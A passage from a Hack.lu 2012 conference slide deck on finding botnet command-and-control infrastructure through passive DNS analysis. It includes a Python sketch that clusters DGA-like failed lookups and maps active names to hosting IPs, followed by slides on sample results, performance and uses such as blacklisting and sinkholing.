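     for n in ("qzvkxpdl", "mwrzjgbt", "xkvqhzpn", "zjbwqvxk")]
    + [("pkqzxmvr.example.org", NOERROR, "198.51.100.7")]     # one sibling went live
    + [("avatarmaker.example.org", NXDOMAIN, None)]           # natural name, same zone
    + [("mail.intranet.corp", SERVFAIL, None)] * 6            # one broken internal name
    + [("news.intranet.corp", SERVFAIL, None), ("blog.intranet.corp", SERVFAIL, None)]
    + [("files.shop-stuff.example", NOERROR, "198.51.100.7")]  # shares the live IP
    + [("www.daily-news.example", NOERROR, "203.0.113.10")]    # unrelated
)


def wordiness(label):
    """Fraction of the label's bigrams seen in the vocabulary (0 = random-looking)."""
    bigrams = [label[i:i + 2] for i in range(len(label) - 1)]
    if not bigrams:
        return 1.0
    return sum(b in KNOWN_BIGRAMS for b in bigrams) / len(bigrams)


def similarity_key(qname):
    """f(zone, pattern): zone = last two labels, depth = label count, and a
    coarse bucket of the leftmost label's length, so DGA siblings share a key."""
    labels = qname.lower().rstrip(".").split(".")
    return (".".join(labels[-2:]), len(labels), len(labels[0]) // 5)


def find_dga_clusters(records):
    """Group failed lookups by similarity key; keep clusters whose names are
    numerous, queried about equally often (even distribution) and look generated."""
    per_key = defaultdict(Counter)
    for qname, rcode, _ in records:
        if rcode in (NXDOMAIN, SERVFAIL):
            per_key[similarity_key(qname)][qname.lower()] += 1
    clusters = {}
    for key, counts in per_key.items():
        if len(counts) < MIN_NAMES:
            continue                                        # too few names to be a pattern
        evenness = min(counts.values()) / max(counts.values())
        mean_wordiness = sum(wordiness(n.split(".")[0]) for n in counts) / len(counts)
        if evenness >= MIN_EVENNESS and mean_wordiness <= MAX_WORDINESS:
            clusters[key] = sorted(counts)
    return clusters


def analyze(records):
    """Pipeline: DGA clusters -> same-shaped names that did resolve ("were
    active") -> their IPs -> other names hosted on those IPs (IP -> domain)."""
    clusters = find_dga_clusters(records)
    active, infra_ips = set(), set()
    for qname, rcode, ip in records:
        if rcode == NOERROR and similarity_key(qname) in clusters:
            active.add(qname.lower())
            infra_ips.add(ip)
    related = {q.lower() for q, rc, ip in records
               if rc == NOERROR and ip in infra_ips and q.lower() not in active}
    return {"clusters": clusters, "active": sorted(active),
            "infra_ips": sorted(infra_ips), "related": sorted(related)}


if __name__ == "__main__":
    for k, v in analyze(SAMPLE).items():
        print(k, v)
```

The broken internal name (`mail.intranet.corp`) fails far more often than its neighbours, so the evenness test rejects it, and `avatarmaker.example.org` never forms a cluster of its own, which is the kind of false positive the slides say is filtered by a common-denominator check.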
![Page 72: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/72.jpg)
73
Sample analysis
● Get other members of the cluster
![Page 73: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/73.jpg)
74
Sample analysis
● Find common members (notice avatarmaker.eu could be a false positive, easily filtered out through common denominator filtering (IP, WHOIS information))
![Page 74: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/74.jpg)
75
Sample analysis
● So we have C&C IP 66.175.210.173
● We can continue mining to see if we get any other domain names:
![Page 75: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/75.jpg)
76
IP → domain transform
![Page 76: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/76.jpg)
77
Automation
![Page 77: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/77.jpg)
78
Performance
● On a single machine (32 GB RAM) we run up to 2000 pkt/sec without significant performance loss
● Average load:
![Page 78: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/78.jpg)
79
Other Interesting numbers
● Packets per day: ~130M filtered
● Malicious domains/day: ~30k DNS queries (varies)
● Avg. 30-50 req/minute for a single domain
![Page 79: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/79.jpg)
80
Uses of the data
● Obvious: blacklists
● Botnet take overs (costs 11 USD or less ;)
● Sinkholing
![Page 80: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/80.jpg)
81
Demotime :)
● (demos, let's look at some videos :)
![Page 81: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/81.jpg)
82
Questions?
@fygrave @vbkropotov
![Page 82: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/82.jpg)
83
Feedback: @fygrave, @vbkropotov (also @ gmail.com)
Code:
https://github.com/fygrave/dnslyzer.git